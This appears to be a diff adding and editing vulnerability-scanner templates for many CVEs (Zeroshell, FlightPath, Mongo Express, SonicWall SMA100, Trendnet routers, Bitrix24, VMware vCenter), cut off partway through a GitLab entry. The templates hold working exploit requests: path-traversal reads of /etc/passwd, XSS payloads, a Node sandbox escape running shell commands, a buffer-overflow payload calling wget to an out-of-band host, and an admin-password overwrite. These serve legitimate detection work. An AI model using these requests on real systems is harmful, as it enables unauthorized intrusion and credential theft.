description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
|
||||
remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
|
||||
reference:
|
||||
- https://www.zeroshell.org/new-release-and-critical-vulnerability/
|
||||
- https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
|
||||
- https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
|
||||
tags: cve,cve2019,rce,zeroshell
|
||||
|
@ -30,4 +28,6 @@ requests:
|
|||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
||||
- "((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+"
|
||||
|
||||
# Enhanced by mp on 2022/02/04
|
||||
|
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2019-13396
|
||||
info:
|
||||
name: FlightPath Local File Inclusion
|
||||
author: 0x_Akoko,daffainfo
|
||||
severity: high
|
||||
description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47121
|
||||
- https://www.cvedetails.com/cve/CVE-2019-13396/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-13396
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2019-13396
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2019,flightpath,lfi
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: token
|
||||
part: body
|
||||
group: 1
|
||||
internal: true
|
||||
regex:
|
||||
- "idden' name='form_token' value='([a-z0-9]+)'>"
|
|
@ -1,11 +1,12 @@
|
|||
id: CVE-2019-13462
|
||||
|
||||
info:
|
||||
name: Lansweeper through 7.1.115.4 unauthenticated SQL injection
|
||||
name: Lansweeper Unauthenticated SQL Injection
|
||||
author: divya_mudgal
|
||||
severity: critical
|
||||
reference: https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/
|
||||
description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameters to /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI.
|
||||
description: Lansweeper before 7.1.117.4 allows unauthenticated SQL injection.
|
||||
remediation: Upgrade to the latest version.
|
||||
tags: cve,cve2019,sqli,lansweeper
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
|
@ -34,3 +35,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
||||
# Enhanced by mp on 2022/02/04
|
||||
|
|
|
@ -31,3 +31,4 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 500
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2020-12447
|
||||
info:
|
||||
name: Onkyo TX-NR585 Web Interface - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal
|
||||
reference:
|
||||
- https://blog.spookysec.net/onkyo-lfi
|
||||
- https://www.cvedetails.com/cve/CVE-2020-12447
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2020-12447
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2020,onkyo,lfi,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,34 +2,40 @@ id: CVE-2020-13483
|
|||
|
||||
info:
|
||||
name: Bitrix24 through 20.0.0 allows XSS
|
||||
author: pikpikcu
|
||||
author: pikpikcu,3th1c_yuk1
|
||||
severity: medium
|
||||
reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
|
||||
description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
|
||||
tags: cve,cve2020,xss,bitrix
|
||||
reference:
|
||||
- https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
|
||||
- https://twitter.com/brutelogic/status/1483073170827628547
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-13483
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2020,xss,bitrix
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'
|
||||
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
|
||||
part: body
|
||||
words:
|
||||
- '<a href="/*">*/)});function __MobileAppList(){alert(1)}//'
|
||||
- "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -6,17 +6,12 @@ info:
|
|||
severity: critical
|
||||
reference:
|
||||
- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
|
||||
- https://www.oracle.com/security-alerts/cpuoct2020.html
|
||||
- https://twitter.com/jas502n/status/1321416053050667009
|
||||
- https://youtu.be/JFVDOIL0YtA
|
||||
- https://github.com/jas502n/CVE-2020-14882#eg
|
||||
description: |
|
||||
Vulnerability in the Oracle WebLogic Server
|
||||
product of Oracle Fusion Middleware (component: Console).
|
||||
Supported versions that are affected are 10.3.6.0.0,
|
||||
12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
|
||||
Easily exploitable vulnerability allows unauthenticated
|
||||
attacker with network access via HTTP to compromise the server.
|
||||
Successful attacks of this vulnerability can result in takeover.
|
||||
description: An easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
|
||||
remediation: Apply the appropriate security update.
|
||||
tags: cve,cve2020,oracle,rce,weblogic,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
|
@ -44,3 +39,4 @@ requests:
|
|||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
# Enhanced by mp on 2022/02/08
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2020-18268
|
||||
|
||||
info:
|
||||
name: Z-BlogPHP 1.5.2 Open redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
|
||||
reference:
|
||||
- https://github.com/zblogcn/zblogphp/issues/216
|
||||
- https://www.cvedetails.com/cve/CVE-2020-18268
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-18268
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2020,redirect,zblogphp,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /zb_system/cmd.php?act=verify HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 81
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
|
||||
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
|
||||
|
||||
- |
|
||||
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2020-23575
|
||||
|
||||
info:
|
||||
name: Kyocera Printer d-COPIA253MF - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: A directory traversal vulnerability exists in Kyocera Printer d-COPIA253MF plus. Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/48561
|
||||
- https://www.cvedetails.com/cve/CVE-2020-23575
|
||||
- https://www.kyoceradocumentsolutions.com.tr/tr.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2020-23575
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2020,printer,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "root:.*:0:0"
|
||||
- "bin:.*:1:1"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
|
||||
author: Ganofins
|
||||
severity: critical
|
||||
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
|
||||
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
|
||||
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
|
||||
tags: cve,cve2020,wordpress,wp-plugin,rce,upload
|
||||
classification:
|
||||
|
|
|
@ -0,0 +1,51 @@
|
|||
id: CVE-2020-24391
|
||||
|
||||
info:
|
||||
name: Mongo Express Remote Code Execution
|
||||
author: leovalcante
|
||||
severity: critical
|
||||
description: Mongo-express uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to RCE in the context of the node server.
|
||||
reference:
|
||||
- https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24391
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2020-24391
|
||||
tags: cve,cve2020,mongo,express,rce,intrusive
|
||||
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /checkValid HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
|
||||
|
||||
- |
|
||||
GET /public/css/{{randstr}}.css HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body_3
|
||||
regex:
|
||||
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
|
@ -29,9 +29,9 @@ requests:
|
|||
- "Contact Form 7"
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- '^== Changelog =="'
|
||||
- type: word
|
||||
words:
|
||||
- '== Changelog =='
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
|
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2020-35749
|
||||
|
||||
info:
|
||||
name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35749
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 7.7
|
||||
cve-id: CVE-2020-35749
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
- |
|
||||
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2020-36365
|
||||
|
||||
info:
|
||||
name: Smartstore < 4.1.0 - Open redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
|
||||
reference:
|
||||
- https://github.com/smartstore/SmartStoreNET/issues/2113
|
||||
- https://www.cvedetails.com/cve/CVE-2020-36365
|
||||
- https://github.com/smartstore/SmartStoreNET
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-36365
|
||||
cwe-id: CWE-601
|
||||
metadata:
|
||||
shodan-query: http.html:'content="Smartstore'
|
||||
tags: cve,cve2020,redirect,smartstore
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
|
||||
author: gy741
|
||||
severity: high
|
||||
description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
|
||||
description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
|
||||
reference:
|
||||
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
|
||||
tags: cve,cve2020,cacti,rce,oast
|
||||
|
|
|
@ -2,8 +2,10 @@ id: CVE-2020-9402
|
|||
|
||||
info:
|
||||
name: Django SQL Injection
|
||||
description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.
|
||||
description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://www.debian.org/security/2020/dsa-4705
|
||||
- https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
|
||||
- https://docs.djangoproject.com/en/3.0/releases/security/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-9402
|
||||
|
@ -29,3 +31,5 @@ requests:
|
|||
- "ORA-06512:"
|
||||
- "Request Method:"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/02/04
|
||||
|
|
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2021-20038
|
||||
|
||||
info:
|
||||
name: SonicWall SMA100 Stack BoF to Unauthenticated RCE
|
||||
author: dwisiswant0, jbaines-r7
|
||||
severity: critical
|
||||
description: |
|
||||
A Stack-based buffer overflow vulnerability in SMA100
|
||||
Apache httpd server's mod_cgi module environment variables
|
||||
allows a remote unauthenticated attacker to potentially
|
||||
execute code as a 'nobody' user in the appliance.
|
||||
This vulnerability affected SMA 200, 210, 400, 410 and 500v
|
||||
appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv,
|
||||
10.2.1.2-24sv and earlier versions.
|
||||
reference:
|
||||
- https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis
|
||||
tags: cve,cve2021,overflow,rce,sonicwall
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-20038
|
||||
cwe-id: CWE-787
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};?{{repeat("A", 518)}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
attack: clusterbomb
|
||||
payloads:
|
||||
prefix_addr:
|
||||
- "%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf" # stack's top address
|
||||
system_addr:
|
||||
- "%08%b7%06%08" # for 10.2.1.2-24sv
|
||||
- "%64%b8%06%08" # for 10.2.1.1-1[79]sv
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
|
@ -0,0 +1,54 @@
|
|||
id: CVE-2021-20150
|
||||
|
||||
info:
|
||||
name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2021-54
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 5.30
|
||||
cve-id: CVE-2021-20150
|
||||
cwe-id: CWE-287
|
||||
metadata:
|
||||
shodan-query: http.html:"TEW-827DRU"
|
||||
tags: cve,cve2021,trendnet,disclosure,router
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /apply_sec.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'ftp_username'
|
||||
- 'ftp_password'
|
||||
- 'ftp_permission'
|
||||
- 'TEW-827DRU'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
name: password
|
||||
group: 1
|
||||
regex:
|
||||
- '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'
|
|
@ -0,0 +1,51 @@
|
|||
id: CVE-2021-20158
|
||||
|
||||
info:
|
||||
name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password change
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2021-54
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-20158
|
||||
cwe-id: CWE-287
|
||||
metadata:
|
||||
shodan-query: http.html:"TEW-827DRU"
|
||||
tags: cve,cve2021,trendnet,disclosure,router,intrusive,dos
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /apply_sec.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei
|
||||
- |
|
||||
POST /apply_sec.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'setConnectDevice'
|
||||
- 'setInternet'
|
||||
- 'setWlanSSID'
|
||||
- 'TEW-827DRU'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-20792
|
||||
|
||||
info:
|
||||
name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors."
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20792
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-20792
|
||||
cwe-id: CWE-79
|
||||
tags: wordpress,cve,cve2021,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=mlw_quiz_list&s="></script><script>alert(document.domain)</script>&paged="></script><script>alert(document.domain)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2021-21973
|
||||
|
||||
info:
|
||||
name: VMware vCenter Unauthenticated SSRF
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21973
|
||||
- https://twitter.com/osama_hroot/status/1365586206982082560
|
||||
- https://twitter.com/bytehx343/status/1486582542807420928
|
||||
tags: cve,cve2021,vmware,ssrf,vcenter,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.30
|
||||
cve-id: CVE-2021-21973
|
||||
cwe-id: CWE-918
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Vcip: {{interactsh-url}}
|
||||
Vcpassword: {{rand_base(6)}}
|
||||
Vcusername: {{rand_base(6)}}
|
||||
Reqresource: {{rand_base(6)}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "The server sent HTTP status code 200"
|
|
@ -1,63 +1,128 @@
|
|||
id: CVE-2021-22205
|
||||
|
||||
info:
|
||||
name: GitLab CE/EE Unauthenticated RCE using ExifTool
|
||||
author: pdteam
|
||||
name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection
|
||||
author: GitLab Red Team
|
||||
severity: critical
|
||||
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
|
||||
